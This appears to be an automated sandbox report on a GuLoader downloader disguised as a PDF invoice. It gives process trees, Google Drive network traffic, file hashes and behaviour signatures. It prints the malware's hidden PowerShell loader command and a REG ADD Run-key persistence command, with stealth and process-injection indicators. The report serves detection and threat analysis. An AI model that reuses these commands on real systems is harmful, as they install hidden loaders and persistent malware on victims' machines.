Malware Analysis Report

2024-10-18 23:08

Sample ID 240709-ltcejaxejk
Target Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe
SHA256 4412e46cdfffa346ea1d4e07b30077ccaa09fe1cbbe6f9965df193f2e063f4b7
Tags
guloader downloader execution persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4412e46cdfffa346ea1d4e07b30077ccaa09fe1cbbe6f9965df193f2e063f4b7

Threat Level: Known bad

The file Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe was found to be: Known bad.

Malicious Activity Summary

guloader downloader execution persistence

Guloader,Cloudeye

Command and Scripting Interpreter: PowerShell

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Enumerates physical storage devices

Program crash

NSIS installer

Modifies registry key

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-09 09:49

Signatures

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-09 09:49

Reported

2024-07-09 09:51

Platform

win7-20240704-en

Max time kernel

119s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe"

Signatures

Guloader,Cloudeye

downloader guloader

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\Ortyginae = "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\\Audiometeret\\').Rudolph;%Monopolizables% ($masturbated)" C:\Windows\SysWOW64\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2428 set thread context of 2908 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 328 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 328 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 328 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 328 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2428 wrote to memory of 2908 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2428 wrote to memory of 2908 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2428 wrote to memory of 2908 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2428 wrote to memory of 2908 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2428 wrote to memory of 2908 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2428 wrote to memory of 2908 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2908 wrote to memory of 2792 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2908 wrote to memory of 2792 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2908 wrote to memory of 2792 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2908 wrote to memory of 2792 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2792 wrote to memory of 2788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2792 wrote to memory of 2788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2792 wrote to memory of 2788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2792 wrote to memory of 2788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe

"C:\Users\Admin\AppData\Local\Temp\Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -windowstyle hidden "$Vangede=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Reexpression.Tid';$Spondylotomy=$Vangede.SubString(70479,3);.$Spondylotomy($Vangede)"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ortyginae" /t REG_EXPAND_SZ /d "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\Audiometeret\').Rudolph;%Monopolizables% ($masturbated)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ortyginae" /t REG_EXPAND_SZ /d "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\Audiometeret\').Rudolph;%Monopolizables% ($masturbated)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 216.58.201.99:80 o.pki.goog tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp

Files

memory/2428-11-0x0000000074331000-0x0000000074332000-memory.dmp

memory/2428-14-0x0000000074330000-0x00000000748DB000-memory.dmp

memory/2428-13-0x0000000074330000-0x00000000748DB000-memory.dmp

memory/2428-12-0x0000000074330000-0x00000000748DB000-memory.dmp

memory/2428-15-0x0000000074330000-0x00000000748DB000-memory.dmp

C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Reexpression.Tid

MD5 d89dac6d6bcfb431c31bdf7d21f48fbd
SHA1 2f55f2b77da6a9078c7bb90fd87b205c9c4cf3b9
SHA256 ffeacf6c0a98133600a0f1de25732fb4b22b06af6921edd316e52a6d7837359b
SHA512 76eb9025c18fd7661cb72d47c7eda57a45304594e5aea32fe73b1dd94ec9db81753726f83e6d9f82924c3b9295eef4725dbaa7d633963ac8e8e91b7444346070

memory/2428-18-0x0000000074330000-0x00000000748DB000-memory.dmp

C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Boomless.Fag

MD5 1a78d0f226d0db154812e61b8cadb4b8
SHA1 e76650e32ed8bc1e3d72dde1aa6566ff031e0c6e
SHA256 19997e372b58bcd5bacd8b199b1633307f0c89fc3ce7abfd4087ec739742f78e
SHA512 b06759e8bfeb73187c5277aaaa9c6489f51a88f42b461ec0775de6741f6b797dc3c2cbb8f6cf79815078a420a26cde9cedd861c4d16ac73a037e2160efc4ec41

memory/2428-20-0x0000000074330000-0x00000000748DB000-memory.dmp

memory/2428-21-0x0000000006690000-0x000000000922E000-memory.dmp

memory/2428-22-0x0000000074330000-0x00000000748DB000-memory.dmp

memory/2908-42-0x0000000001FC0000-0x0000000004B5E000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-09 09:49

Reported

2024-07-09 09:51

Platform

win10v2004-20240704-en

Max time kernel

148s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe

"C:\Users\Admin\AppData\Local\Temp\Orange_doklad_CN0413278003_20240705_FR09831200076590·pdf.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -windowstyle hidden "$Vangede=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Reexpression.Tid';$Spondylotomy=$Vangede.SubString(70479,3);.$Spondylotomy($Vangede)"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 2996 -ip 2996

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2996 -s 2492

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 146.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp

Files

memory/2996-9-0x000000007436E000-0x000000007436F000-memory.dmp

memory/2996-10-0x0000000002E50000-0x0000000002E86000-memory.dmp

memory/2996-11-0x00000000055B0000-0x0000000005BD8000-memory.dmp

memory/2996-12-0x0000000074360000-0x0000000074B10000-memory.dmp

memory/2996-13-0x0000000074360000-0x0000000074B10000-memory.dmp

memory/2996-14-0x0000000005520000-0x0000000005542000-memory.dmp

memory/2996-16-0x0000000005D80000-0x0000000005DE6000-memory.dmp

memory/2996-15-0x0000000005D10000-0x0000000005D76000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cgju2ndj.ygv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2996-26-0x0000000005DF0000-0x0000000006144000-memory.dmp

memory/2996-27-0x00000000063F0000-0x000000000640E000-memory.dmp

memory/2996-28-0x0000000006430000-0x000000000647C000-memory.dmp

memory/2996-29-0x00000000073C0000-0x0000000007456000-memory.dmp

memory/2996-30-0x0000000006920000-0x000000000693A000-memory.dmp

memory/2996-31-0x00000000069A0000-0x00000000069C2000-memory.dmp

memory/2996-32-0x0000000007A10000-0x0000000007FB4000-memory.dmp

C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Reexpression.Tid

MD5 d89dac6d6bcfb431c31bdf7d21f48fbd
SHA1 2f55f2b77da6a9078c7bb90fd87b205c9c4cf3b9
SHA256 ffeacf6c0a98133600a0f1de25732fb4b22b06af6921edd316e52a6d7837359b
SHA512 76eb9025c18fd7661cb72d47c7eda57a45304594e5aea32fe73b1dd94ec9db81753726f83e6d9f82924c3b9295eef4725dbaa7d633963ac8e8e91b7444346070

memory/2996-34-0x0000000008640000-0x0000000008CBA000-memory.dmp

memory/2996-36-0x0000000074360000-0x0000000074B10000-memory.dmp